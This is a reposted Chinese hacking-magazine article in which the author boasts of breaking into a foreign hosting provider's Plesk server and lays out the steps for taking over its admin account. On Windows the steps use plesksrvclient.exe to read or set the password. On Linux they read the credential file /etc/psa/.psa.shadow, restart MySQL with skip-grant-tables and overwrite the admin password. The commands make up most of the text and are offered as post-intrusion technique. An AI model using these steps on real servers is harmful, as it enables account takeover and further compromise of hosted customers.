重置Plesk的Admin帐号密码提权

安全 应用安全
前几天提权了个国外的空间商服务器,装的是plesk主机管理系统,以前就知道可以在服务器上直接找回密码,顺手弄了一下,找到了方案,完了直接在IP后面加上8443访问,当然以SSL方式访问哦!

前几天提权了个国外的空间商服务器,装的是plesk主机管理系统,以前就知道可以在服务器上直接找回密码,顺手弄了一下,找到了方案,完了直接在IP后面加上8443访问,当然以SSL方式访问哦!

说下Windows 和Linux下的两种方案吧!

登陆到windows,运行如下命令:

C:\Program Files\Swsoft\Plesk\admin\bin\plesksrvclient.exe

即可。

也可以采用命令行方式:

plesksrvclient.exe -get 获取当前密码

plesksrvclient.exe -set 123456 设置新密码为123456

登陆到linux,运行cat /etc/psa/.psa.shadow可以查看到当前密码

重置密码方法

1.编辑/etc/my.cnf

在[mysqld]项下加入skip-grant-tables

重启mysql,执行/etc/init.d/mysqld restart

2.运行/usr/bin/mysql -D mysql -e”update user set password=PASSWORD(‘`cat /etc/psa/.psa.shadow`’) where User=’admin’;”

重置成当前.psa.shadow中的密码。

3.去除skip-grant-tables,重启mysql,完成。

责任编辑:蓝雨泪 来源: 黑客x档案
相关推荐

2010-01-07 16:19:53

Ubuntu root

2012-06-26 10:11:17

2010-12-10 15:23:49

Linux漏洞

2012-12-14 13:35:29

2013-04-25 09:46:19

身份验证谷歌

2014-07-23 09:28:09

2009-03-19 16:19:53

2009-04-14 15:08:29

2011-03-07 11:36:23

FileZillaSe

2015-07-14 10:08:31

密码帐号密码数据保护

2024-06-07 06:35:08

2015-06-30 11:58:16

2021-01-13 08:14:36

Windows提权漏洞攻击

2009-07-25 16:52:29

2021-01-06 08:04:30

Linux方式提权

2013-11-29 15:34:00

2021-05-01 20:52:30

漏洞网络安全网络攻击

2023-06-11 17:24:26

2015-09-22 10:25:13

2016-12-12 09:11:20

点赞
收藏

51CTO技术栈公众号